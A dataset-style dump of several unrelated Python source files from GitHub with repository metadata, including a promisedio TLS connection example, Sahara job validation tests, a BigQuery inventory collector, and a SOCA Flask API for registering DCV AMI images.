| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75b207a985e8fc2e2ac54f7ef3b3b97efd0e8a7f
| 1,050
|
py
|
Python
|
examples/tcp.py
|
promisedio/uv
|
b2da55e28da4a3185d810055468389822ec94f2b
|
[
"MIT"
] | null | null | null |
examples/tcp.py
|
promisedio/uv
|
b2da55e28da4a3185d810055468389822ec94f2b
|
[
"MIT"
] | null | null | null |
examples/tcp.py
|
promisedio/uv
|
b2da55e28da4a3185d810055468389822ec94f2b
|
[
"MIT"
] | null | null | null |
import ssl
import certifi
from promisedio import loop, ns, promise, timer
async def example1():
    """Open a verified TLS connection to www.verisign.com 100 times, issue a
    bare GET, print the response and shut the stream down.

    BUG FIX: on timeout the original handler did ``pass`` and fell through to
    ``stream.getsockname()``. On a first-iteration timeout ``stream`` is
    unbound (NameError); on later timeouts a stale, already-shut-down stream
    would be reused. The attempt is now skipped with ``continue``.
    """
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    context.verify_mode = ssl.CERT_REQUIRED
    context.check_hostname = True
    context.load_default_certs()
    context.load_verify_locations(
        cafile=certifi.where(),
        capath=None,
        cadata=None
    )
    for x in range(100):
        try:
            stream = await ns.open_connection(
                ("209.131.162.45", 443), ssl=context,
                server_hostname="www.verisign.com", timeout=0.2)
        except timer.TimeoutError:
            # Connection attempt timed out — try the next iteration.
            continue
        print(stream.getsockname())
        print(stream.getpeername())
        await stream.write(b"GET / HTTP 1.1\n\n")
        print(await stream.read())
        await stream.shutdown()
async def example2():
    """Open a plain TCP connection to 192.168.1.99:8080 (2s timeout),
    print the local and peer addresses, then shut the stream down."""
    stream = await ns.open_connection(("192.168.1.99", 8080), timeout=2)
    for address in (stream.getsockname(), stream.getpeername()):
        print(address)
    await stream.shutdown()
# Schedule example1 on the promisedio event loop and run until stopped.
promise.exec_async(example1())
loop.run_forever()
| 26.25
| 119
| 0.648571
| 130
| 1,050
| 5.130769
| 0.592308
| 0.065967
| 0.038981
| 0.050975
| 0.245877
| 0.164918
| 0.164918
| 0.164918
| 0
| 0
| 0
| 0.047205
| 0.233333
| 1,050
| 39
| 120
| 26.923077
| 0.781366
| 0
| 0
| 0.193548
| 0
| 0
| 0.057143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.032258
| 0.096774
| 0
| 0.096774
| 0.16129
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75b2d9cf0513bac35f38ddd5680c08dee820e7ca
| 3,232
|
py
|
Python
|
sahara/tests/unit/service/validation/edp/test_job.py
|
hortonworksqe/sahara
|
b8edeaf2b6a475728bf9fd2ddc3a860dc6c23270
|
[
"Apache-2.0"
] | 1
|
2016-04-13T17:07:05.000Z
|
2016-04-13T17:07:05.000Z
|
sahara/tests/unit/service/validation/edp/test_job.py
|
hortonworksqe/sahara
|
b8edeaf2b6a475728bf9fd2ddc3a860dc6c23270
|
[
"Apache-2.0"
] | null | null | null |
sahara/tests/unit/service/validation/edp/test_job.py
|
hortonworksqe/sahara
|
b8edeaf2b6a475728bf9fd2ddc3a860dc6c23270
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sahara.service.validations.edp import job as j
from sahara.tests.unit.service.validation import utils as u
from sahara.utils import edp
class TestJobValidation(u.ValidationTestCase):
    """Unit tests for the EDP job-creation schema and mains/libs checks."""

    def setUp(self):
        super(TestJobValidation, self).setUp()
        # Validate objects through the mains/libs consistency check
        # against the job JSON schema.
        self._create_object_fun = j.check_mains_libs
        self.scheme = j.JOB_SCHEMA

    def test_empty_libs(self):
        # MapReduce and Java jobs must supply "libs"...
        for job_type in [edp.JOB_TYPE_MAPREDUCE, edp.JOB_TYPE_JAVA]:
            self._assert_create_object_validation(
                data={
                    "name": "jar.jar",
                    "type": job_type
                },
                bad_req_i=(1, "INVALID_DATA",
                           "%s flow requires libs" % job_type))
        # ...while streaming MapReduce is exempt from that requirement.
        self._assert_create_object_validation(
            data={
                "name": "jar.jar",
                "type": edp.JOB_TYPE_MAPREDUCE_STREAMING,
            })

    def test_mains_unused(self):
        # MapReduce and Java jobs must not set "mains" at all.
        for job_type in [edp.JOB_TYPE_MAPREDUCE, edp.JOB_TYPE_JAVA]:
            self._assert_create_object_validation(
                data={
                    "name": "jar.jar",
                    "type": job_type,
                    "mains": ["lib1"],
                    "libs": ["lib2"]
                },
                bad_req_i=(1, "INVALID_DATA",
                           "%s flow does not use mains" % job_type))

    def test_empty_pig_mains(self):
        # Pig and Hive jobs require a main script in "mains".
        data = {
            "name": "pig.pig",
            "type": edp.JOB_TYPE_PIG,
            "libs": ['lib-uuid']
        }
        self._assert_create_object_validation(
            data=data, bad_req_i=(1, "INVALID_DATA",
                                  "Pig flow requires main script"))
        data.update({"type": edp.JOB_TYPE_HIVE})
        self._assert_create_object_validation(
            data=data, bad_req_i=(1, "INVALID_DATA",
                                  "Hive flow requires main script"))

    def test_overlap_libs(self):
        # "mains" and "libs" must be disjoint.
        for job_type in [edp.JOB_TYPE_HIVE, edp.JOB_TYPE_PIG]:
            self._assert_create_object_validation(
                data={
                    "name": "jar.jar",
                    "type": job_type,
                    "libs": ["lib1", "lib2"],
                    "mains": ["lib1"]
                },
                bad_req_i=(1, "INVALID_DATA", "'mains' and 'libs' overlap"))

    def test_jar_rejected(self):
        # "Jar" is not a recognized job type at all -> schema-level error.
        self._assert_create_object_validation(
            data={
                "name": "jar.jar",
                "type": "Jar",
            },
            bad_req_i=(1, "VALIDATION_ERROR",
                       "'Jar' is not one of " + str(edp.JOB_TYPES_ALL)))
| 35.130435
| 76
| 0.552599
| 379
| 3,232
| 4.469657
| 0.337731
| 0.070248
| 0.053129
| 0.090909
| 0.347107
| 0.347107
| 0.335891
| 0.335891
| 0.307556
| 0.287485
| 0
| 0.008958
| 0.34375
| 3,232
| 91
| 77
| 35.516484
| 0.789722
| 0.171101
| 0
| 0.40625
| 0
| 0
| 0.140766
| 0
| 0
| 0
| 0
| 0
| 0.109375
| 1
| 0.09375
| false
| 0
| 0.046875
| 0
| 0.15625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75b2efb0dac87ecec2330f57bb9b5abeb2ef6c62
| 1,705
|
py
|
Python
|
modules/AzureBridge/main.py
|
open-edge-insights/eii-azure-bridge
|
346da9d56be78c6e06a470dfbaf808d568427679
|
[
"MIT"
] | null | null | null |
modules/AzureBridge/main.py
|
open-edge-insights/eii-azure-bridge
|
346da9d56be78c6e06a470dfbaf808d568427679
|
[
"MIT"
] | null | null | null |
modules/AzureBridge/main.py
|
open-edge-insights/eii-azure-bridge
|
346da9d56be78c6e06a470dfbaf808d568427679
|
[
"MIT"
] | 2
|
2022-02-07T09:05:54.000Z
|
2022-03-17T04:32:50.000Z
|
# Copyright (c) 2020 Intel Corporation.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM,OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""EII Message Bus Azure Edge Runtime Bridge
"""
import asyncio
import traceback as tb
from eab.bridge_state import BridgeState
def main():
    """Start the EII/Azure bridge and run the asyncio loop forever.

    Any exception is logged with a traceback and re-raised; the bridge and
    the event loop are always cleaned up on the way out.
    """
    bs = None
    # BUG FIX: `loop` must be pre-initialized. If BridgeState.get_instance()
    # raises, the original `finally` block referenced an unbound `loop`,
    # masking the real error with a NameError.
    loop = None
    try:
        bs = BridgeState.get_instance()
        loop = asyncio.get_event_loop()
        loop.run_forever()
    except Exception as e:
        print(f'[ERROR] {e}\n{tb.format_exc()}')
        raise
    finally:
        if bs is not None:
            # Fully stop the bridge
            bs.stop()
        if loop is not None:
            # Clean up asyncio
            loop.stop()
            loop.close()


if __name__ == "__main__":
    main()
| 34.1
| 78
| 0.70088
| 242
| 1,705
| 4.880165
| 0.570248
| 0.074513
| 0.022015
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003042
| 0.228739
| 1,705
| 49
| 79
| 34.795918
| 0.895057
| 0.678592
| 0
| 0
| 0
| 0
| 0.073643
| 0.042636
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.157895
| 0
| 0.210526
| 0.052632
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75b2fe433461c1164efd99a7fb0d0c61b5a14512
| 8,033
|
py
|
Python
|
src/spaceone/inventory/manager/bigquery/sql_workspace_manager.py
|
spaceone-dev/plugin-google-cloud-inven-collector
|
3e103412e7598ee9fa5f68b6241a831a40e8b9bc
|
[
"Apache-2.0"
] | null | null | null |
src/spaceone/inventory/manager/bigquery/sql_workspace_manager.py
|
spaceone-dev/plugin-google-cloud-inven-collector
|
3e103412e7598ee9fa5f68b6241a831a40e8b9bc
|
[
"Apache-2.0"
] | null | null | null |
src/spaceone/inventory/manager/bigquery/sql_workspace_manager.py
|
spaceone-dev/plugin-google-cloud-inven-collector
|
3e103412e7598ee9fa5f68b6241a831a40e8b9bc
|
[
"Apache-2.0"
] | null | null | null |
import logging
import time
from spaceone.inventory.libs.manager import GoogleCloudManager
from spaceone.inventory.libs.schema.base import ReferenceModel
from spaceone.inventory.connector.bigquery.sql_workspace import SQLWorkspaceConnector
from spaceone.inventory.model.bigquery.sql_workspace.cloud_service import BigQueryWorkSpace, SQLWorkSpaceResource, \
SQLWorkSpaceResponse, ProjectModel
from spaceone.inventory.model.bigquery.sql_workspace.cloud_service_type import CLOUD_SERVICE_TYPES
from datetime import datetime
_LOGGER = logging.getLogger(__name__)
class SQLWorkspaceManager(GoogleCloudManager):
    """Collects Google BigQuery datasets ("SQL workspaces") as SpaceONE
    cloud-service resources, including table and schema details."""

    # Name resolved through self.locator to obtain the BigQuery connector.
    connector_name = 'SQLWorkspaceConnector'
    cloud_service_types = CLOUD_SERVICE_TYPES

    def collect_cloud_service(self, params):
        _LOGGER.debug(f'** Big Query SQL Workspace START **')
        start_time = time.time()
        """
        Args:
            params:
                - options
                - schema
                - secret_data
                - filter
                - zones
        Response:
            CloudServiceResponse/ErrorResourceResponse
        """
        collected_cloud_services = []
        error_responses = []
        # Kept at outer scope so the error handler can report the dataset
        # that was being processed when an exception occurred.
        data_set_id = ""
        secret_data = params['secret_data']
        project_id = secret_data['project_id']

        ##################################
        # 0. Gather All Related Resources
        # List all information through connector
        ##################################
        big_query_conn: SQLWorkspaceConnector = self.locator.get_connector(self.connector_name, **params)
        data_sets = big_query_conn.list_dataset()
        projects = big_query_conn.list_projects()
        update_bq_dt_tables = []
        table_schemas = []
        for data_set in data_sets:
            try:
                ##################################
                # 1. Set Basic Information
                ##################################
                data_refer = data_set.get('datasetReference', {})
                data_set_id = data_refer.get('datasetId')
                dataset_project_id = data_refer.get('projectId')
                bq_dataset = big_query_conn.get_dataset(data_set_id)
                creation_time = bq_dataset.get('creationTime', '')
                last_modified_time = bq_dataset.get('lastModifiedTime')
                region = self._get_region(bq_dataset.get('location', ''))
                exp_partition_ms = bq_dataset.get('defaultPartitionExpirationMs')
                exp_table_ms = bq_dataset.get('defaultTableExpirationMs')

                # skip if dataset id is invisible
                # NOTE(review): only table collection is skipped here; the
                # dataset itself is still collected below — confirm intent.
                if self._get_visible_on_console(data_set_id):
                    bq_dt_tables = big_query_conn.list_tables(data_set_id)
                    update_bq_dt_tables, table_schemas = self._get_table_list_with_schema(big_query_conn, bq_dt_tables)
                labels = self.convert_labels_format(bq_dataset.get('labels', {}))

                ##################################
                # 2. Make Base Data
                ##################################
                bq_dataset.update({
                    'name': data_set_id,
                    'project': project_id,
                    'tables': update_bq_dt_tables,
                    'table_schemas': table_schemas,
                    'region': region,
                    'visible_on_console': self._get_visible_on_console(data_set_id),
                    'matching_projects': self._get_matching_project(dataset_project_id, projects),
                    'creationTime': self._convert_unix_timestamp(creation_time),
                    'lastModifiedTime': self._convert_unix_timestamp(last_modified_time),
                    'default_partition_expiration_ms_display': self._convert_milliseconds_to_minutes(exp_partition_ms),
                    'default_table_expiration_ms_display': self._convert_milliseconds_to_minutes(exp_table_ms),
                    'labels': labels
                })
                big_query_data = BigQueryWorkSpace(bq_dataset, strict=False)

                ##################################
                # 3. Make Return Resource
                ##################################
                big_query_work_space_resource = SQLWorkSpaceResource({
                    'name': data_set_id,
                    'account': project_id,
                    'region_code': region,
                    'tags': labels,
                    'data': big_query_data,
                    'reference': ReferenceModel(big_query_data.reference())
                })

                ##################################
                # 4. Make Collected Region Code
                ##################################
                self.set_region_code(region)

                ##################################
                # 5. Make Resource Response Object
                # List of SQLWorkSpaceResponse Object
                ##################################
                collected_cloud_services.append(SQLWorkSpaceResponse({'resource': big_query_work_space_resource}))
            except Exception as e:
                # One bad dataset must not abort the whole collection run;
                # record an error response and keep going.
                _LOGGER.error(f'[collect_cloud_service] => {e}', exc_info=True)
                error_response = self.generate_resource_error_response(e, 'BigQuery', 'SQLWorkspace', data_set_id)
                error_responses.append(error_response)

        _LOGGER.debug(f'** Big Query Finished {time.time() - start_time} Seconds **')
        return collected_cloud_services, error_responses

    def _get_region(self, location):
        """Map a BigQuery location string to a region code; 'global' if unknown."""
        matched_info = self.match_region_info(location)
        return matched_info.get('region_code') if matched_info else 'global'

    def _get_table_list_with_schema(self, big_conn: SQLWorkspaceConnector, bq_dt_tables):
        """Fetch full table details for each table reference and return
        (tables with converted timestamps, flattened per-table schema fields)."""
        update_bq_dt_tables = []
        table_schemas = []
        for bq_dt_table in bq_dt_tables:
            table_ref = bq_dt_table.get('tableReference')
            table_single = big_conn.get_tables(table_ref.get('datasetId'), table_ref.get('tableId'))
            if table_single is not None:
                creation_time = table_single.get('creationTime')
                expiration_time = table_single.get('expirationTime')
                last_modified_time = table_single.get('lastModifiedTime')
                # Normalize epoch-millisecond strings into datetime objects.
                table_single.update({
                    'creationTime': self._convert_unix_timestamp(creation_time),
                    'expirationTime': self._convert_unix_timestamp(expiration_time),
                    'lastModifiedTime': self._convert_unix_timestamp(last_modified_time)
                })
                _table_schemas = table_single.get('schema', {})
                if _table_schemas != {}:
                    fields = _table_schemas.get('fields', [])
                    table_single.update({'schema': fields})
                    update_bq_dt_tables.append(table_single)

                    # Tag every schema field with its owning table id so the
                    # flattened list can be displayed on its own.
                    for single_schema in fields:
                        single_schema.update({'table_id': table_ref.get('tableId')})
                        table_schemas.append(single_schema)

        return update_bq_dt_tables, table_schemas

    @staticmethod
    def _get_matching_project(project_id, projects):
        """Return ProjectModel entries from *projects* whose id equals *project_id*."""
        _projects = []
        for project in projects:
            if project_id == project.get('id'):
                _projects.append(ProjectModel(project, strict=False))
        return _projects

    @staticmethod
    def _get_visible_on_console(dataset_id):
        # Datasets whose id starts with '_' are hidden in the BigQuery console.
        return False if dataset_id.startswith('_') else True

    @staticmethod
    def _convert_milliseconds_to_minutes(milliseconds):
        """Convert a millisecond count to minutes; None for falsy input."""
        if milliseconds:
            minutes = (int(milliseconds)/1000)/60
            return minutes
        else:
            return None

    @staticmethod
    def _convert_unix_timestamp(unix_timestamp):
        """Convert an epoch-milliseconds value to a datetime; None on failure."""
        try:
            return datetime.fromtimestamp(int(unix_timestamp) / 1000)
        except Exception as e:
            _LOGGER.error(f'[_convert_unix_timestamp] {e}')
            return
| 42.957219
| 119
| 0.578115
| 764
| 8,033
| 5.681937
| 0.215969
| 0.023958
| 0.023036
| 0.022115
| 0.21654
| 0.180604
| 0.152499
| 0.093988
| 0.079244
| 0
| 0
| 0.002833
| 0.2969
| 8,033
| 186
| 120
| 43.188172
| 0.765758
| 0.033362
| 0
| 0.154472
| 0
| 0
| 0.10375
| 0.027488
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056911
| false
| 0
| 0.065041
| 0.00813
| 0.219512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75b763c3212f1f5ddcadc048b167842b24fdff2e
| 1,732
|
py
|
Python
|
worker_zeromq/resource.py
|
espang/projects
|
3a4d93592bc3427a6abd8d2170081155862754a8
|
[
"MIT"
] | null | null | null |
worker_zeromq/resource.py
|
espang/projects
|
3a4d93592bc3427a6abd8d2170081155862754a8
|
[
"MIT"
] | null | null | null |
worker_zeromq/resource.py
|
espang/projects
|
3a4d93592bc3427a6abd8d2170081155862754a8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 26 09:11:06 2016
@author: eikes
"""
import ConfigParser
from components import Component
from result import VariableResult
# Parse the scenario configuration once at import time.
_config = ConfigParser.ConfigParser()
_config.read('scenario.cfg')
# Section/option names used throughout this module.
_section = 'MySection'
_results = 'results'
def _create_comp(index):
    """Build the Component described by the ``comp.<index>.*`` options of
    the scenario config's main section.

    Note: the original declared ``global _config, _section`` although both
    globals are only read here; the needless declaration has been dropped.
    """
    # Comma-separated connection list, whitespace-trimmed per entry.
    connections = map(str.strip, _config.get(
        _section,
        'comp.{0}.connections'.format(index),
    ).split(','))
    return Component(
        _config.get(_section, 'comp.{0}.name'.format(index)),
        _config.get(_section, 'comp.{0}.type'.format(index)),
        _config.get(_section, 'comp.{0}.reference_values'.format(index)),
        connections,
        _config.get(_section, 'comp.{0}.replace_values'.format(index)),
        _config.getfloat(_section, 'comp.{0}.factor'.format(index)),
    )
def _create_results():
    """Build one VariableResult per ``result.<i>.*`` entry in the config's
    results section (1-based, count taken from the ``quantity`` option).

    Note: the original declared ``global _config, _results`` although both
    globals are only read here; the needless declaration has been dropped.
    """
    quantity = _config.getint(_results, 'quantity')
    results = []
    for i in range(1, quantity+1):
        label = _config.get(_results, 'result.{0}.name'.format(i))
        comp = _config.get(_results, 'result.{0}.comp'.format(i))
        calc_type = _config.getint(_results, 'result.{0}.type'.format(i))
        results.append(
            VariableResult(pk=i, label=label, comp_name=comp, calc_type=calc_type)
        )
    return results
# Scenario-wide settings resolved at import time from scenario.cfg.
LP_FILE_PATH = _config.get(_section, 'lp')
TRC_FILE_PATH = _config.get(_section, 'trc')
QUANTITY = _config.getint(_section, 'quantity')
# One Component per configured index (1-based in the config file).
COMPONENTS = [ _create_comp(i) for i in range(1, QUANTITY+1) ]
RESULTS = _create_results()
SIMULATIONS = _config.getint(_section, 'simulations')
WORKER = _config.getint(_section, 'worker')
# NOTE(review): the meaning of this constant is not evident from this module — confirm.
S_VALUE = float(1.5855e+07)
| 27.0625
| 90
| 0.663972
| 212
| 1,732
| 5.15566
| 0.334906
| 0.074108
| 0.10247
| 0.091491
| 0.240622
| 0.096981
| 0.096981
| 0
| 0
| 0
| 0
| 0.023371
| 0.184758
| 1,732
| 63
| 91
| 27.492063
| 0.750708
| 0.042725
| 0
| 0
| 0
| 0
| 0.134265
| 0.029162
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04878
| false
| 0
| 0.073171
| 0
| 0.170732
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75b8a1f71cb2c99f52c326ad6e518a675e652f84
| 466
|
py
|
Python
|
sub-array-algorithm-frustated-coders.py
|
annukamat/My-Competitive-Journey
|
adb13a5723483cde13e5f3859b3a7ad840b86c97
|
[
"MIT"
] | 7
|
2018-11-08T11:39:27.000Z
|
2020-09-10T17:50:57.000Z
|
sub-array-algorithm-frustated-coders.py
|
annukamat/My-Competitive-Journey
|
adb13a5723483cde13e5f3859b3a7ad840b86c97
|
[
"MIT"
] | null | null | null |
sub-array-algorithm-frustated-coders.py
|
annukamat/My-Competitive-Journey
|
adb13a5723483cde13e5f3859b3a7ad840b86c97
|
[
"MIT"
] | 2
|
2019-09-16T14:34:03.000Z
|
2019-10-12T19:24:00.000Z
|
# Read the number of coders, then one space-separated line of scores.
ncoders = int(input("enter no. of coders : "))
l=map(int,input().split(" "))
sl=[]
# Work on an ascending copy of the scores.
l = sorted(list(l))
top = 1
for rotator in range(1,ncoders):
    # Prefix of the first `rotator` (smallest) scores under consideration.
    sl = l[:rotator]
    # NOTE(review): indentation was reconstructed from a flattened dump;
    # the else/break is assumed to pair with this guard — confirm upstream.
    if(top != ncoders):
        if(max(sl) < l[top]):
            # Zero out the largest prefix element strictly below the next score.
            l[l.index(max(sl))] = 0
            top = top +1
        elif(max(sl) == l[top]):
            # Tie: zero out the largest among all but the last prefix element.
            l[l.index(max(sl[:len(sl)-1]))] = 0
            top = top+1
    else:
        break
print(l)
print(sum(l))
| 18.64
| 47
| 0.44206
| 69
| 466
| 2.985507
| 0.42029
| 0.058252
| 0.058252
| 0.087379
| 0.203884
| 0.203884
| 0.203884
| 0.203884
| 0.203884
| 0
| 0
| 0.02349
| 0.360515
| 466
| 24
| 48
| 19.416667
| 0.667785
| 0
| 0
| 0.111111
| 0
| 0
| 0.049569
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75ba91add5ced077993a147299ed8098ccb69a59
| 8,081
|
py
|
Python
|
source/soca/cluster_web_ui/api/v1/dcv/image.py
|
cfsnate/scale-out-computing-on-aws
|
1cc316e988dca3200811ff5527a088a1706901e5
|
[
"Apache-2.0"
] | 77
|
2019-11-14T22:54:48.000Z
|
2022-02-09T06:06:39.000Z
|
source/soca/cluster_web_ui/api/v1/dcv/image.py
|
cfsnate/scale-out-computing-on-aws
|
1cc316e988dca3200811ff5527a088a1706901e5
|
[
"Apache-2.0"
] | 47
|
2020-01-15T18:51:32.000Z
|
2022-03-08T19:46:39.000Z
|
source/soca/cluster_web_ui/api/v1/dcv/image.py
|
cfsnate/scale-out-computing-on-aws
|
1cc316e988dca3200811ff5527a088a1706901e5
|
[
"Apache-2.0"
] | 50
|
2019-11-14T22:51:28.000Z
|
2022-03-14T22:49:53.000Z
|
######################################################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance #
# with the License. A copy of the License is located at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# or in the 'license' file accompanying this file. This file is distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES #
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions #
# and limitations under the License. #
######################################################################################################################
import config
from flask_restful import Resource, reqparse
import logging
from decorators import admin_api, restricted_api, private_api
import botocore
import datetime
from models import db, AmiList
import boto3
import errors
from sqlalchemy import exc
from sqlalchemy.exc import SQLAlchemyError
logger = logging.getLogger("api")
session = boto3.session.Session()
aws_region = session.region_name
ec2_client = boto3.client('ec2', aws_region, config=config.boto_extra_config())
def get_ami_info():
    """Map each active AMI label registered in SOCA to its EC2 AMI ID."""
    active_entries = AmiList.query.filter_by(is_active=True).all()
    return {entry.ami_label: entry.ami_id for entry in active_entries}
class ManageImage(Resource):
    """Admin-only REST resource to register/deregister EC2 AMIs as SOCA DCV images."""

    @admin_api
    def post(self):
        """
        Register a new EC2 AMI as DCV image on SOCA
        ---
        tags:
            - DCV
        parameters:
            - in: body
              name: body
              schema:
                required:
                    - os
                    - ami_id
                    - ami_label
                    - root_size
                properties:
                    ami_id:
                        type: string
                        description: EC2 ID of the AMI
                    os:
                        type: string
                        description: Windows or Linux
                    ami_label:
                        type: string
                        description: Friendly name for your image
                    root_size:
                        type: string
                        description: Minimum size of your EC2 AMI
        responses:
            200:
                description: Pair of user/token is valid
            401:
                description: Invalid user/token pair
        """
        parser = reqparse.RequestParser()
        parser.add_argument('ami_id', type=str, location='form')
        parser.add_argument('os', type=str, location='form')
        parser.add_argument('ami_label', type=str, location='form')
        parser.add_argument('root_size', type=str, location='form')
        args = parser.parse_args()
        ami_id = args["ami_id"]
        ami_label = str(args["ami_label"])
        os = args["os"]
        if args["os"] is None or args["ami_label"] is None or args["ami_id"] is None or args["root_size"] is None:
            return errors.all_errors('CLIENT_MISSING_PARAMETER', "os (str), ami_id (str), ami_label (str) and root_size (str) are required.")
        if args["os"].lower() not in ["centos7", "rhel7", "amazonlinux2", "windows"]:
            return errors.all_errors('CLIENT_MISSING_PARAMETER', "os must be centos7, rhel7, amazonlinux2, or windows")
        try:
            root_size = int(args["root_size"])
        except ValueError:
            # BUG FIX: the original interpolated `root_size` here, but that
            # name is unbound when int() raises, so the clean 4xx turned into
            # a NameError. Report the raw submitted value instead.
            return errors.all_errors('IMAGE_REGISTER_ERROR', f"{args['root_size']} must be a valid integer")

        soca_labels = get_ami_info()
        # Register AMI to SOCA
        if ami_label not in soca_labels.keys():
            try:
                # Only AMIs in the 'available' state may be registered.
                ec2_response = ec2_client.describe_images(ImageIds=[ami_id],
                                                          Filters=[{'Name': 'state', 'Values': ['available']}])
                if (len(ec2_response["Images"]) != 0):
                    new_ami = AmiList(ami_id=ami_id,
                                      ami_type=os.lower(),
                                      ami_label=ami_label,
                                      is_active=True,
                                      ami_root_disk_size=root_size,
                                      created_on=datetime.datetime.utcnow())
                    try:
                        db.session.add(new_ami)
                        db.session.commit()
                        return {"success": True, "message": f"{ami_id} registered successfully in SOCA as {ami_label}"}, 200
                    except SQLAlchemyError as e:
                        db.session.rollback()
                        logger.error(f"Failed Creating AMI {ami_label} {ami_id} {e}")
                        return errors.all_errors('IMAGE_REGISTER_ERROR', f"{ami_id} registration not successful")
                else:
                    logger.error(f"{ami_id} is not available in AWS account")
                    return errors.all_errors('IMAGE_REGISTER_ERROR', f"{ami_id} is not available in AWS account. If you just created it, make sure the state of the image is 'available' on the AWS console")
            except botocore.exceptions.ClientError as error:
                logger.error(f"Failed Creating AMI {ami_label} {ami_id} {error}")
                return errors.all_errors('IMAGE_REGISTER_ERROR', f"{ami_id} Couldn't locate {ami_id} in AWS account. Make sure you do have permission to view it")
        else:
            logger.error(f"Label already in use {ami_label}")
            return errors.all_errors('IMAGE_REGISTER_ERROR', f"Label {ami_label} already in use. Please enter a unique label")

    @admin_api
    def delete(self):
        """
        Delete an EC2 AMI registered as DCV image on SOCA
        ---
        tags:
            - DCV
        parameters:
            - in: body
              name: body
              schema:
                required:
                    - ami_label
                properties:
                    ami_label:
                        type: string
                        description: Friendly name for your image
        responses:
            200:
                description: Pair of user/token is valid
            401:
                description: Invalid user/token pair
        """
        parser = reqparse.RequestParser()
        parser.add_argument('ami_label', type=str, location='form')
        args = parser.parse_args()
        if args["ami_label"] is None:
            return errors.all_errors('CLIENT_MISSING_PARAMETER', "ami_label (str) is required.")
        check_session = AmiList.query.filter_by(ami_label=args["ami_label"], is_active=True).first()
        if check_session:
            # Soft delete: deactivate the row rather than removing it.
            check_session.is_active = False
            check_session.deactivated_on = datetime.datetime.utcnow()
            try:
                db.session.commit()
                logger.info(f"AMI Label {args['ami_label']} deleted from SOCA")
                return {"success": True, "message": f"{args['ami_label']} deleted from SOCA successfully"}, 200
            except exc.SQLAlchemyError as e:
                db.session.rollback()
                logger.error(f"AMI Label {args['ami_label']} delete failed {e}")
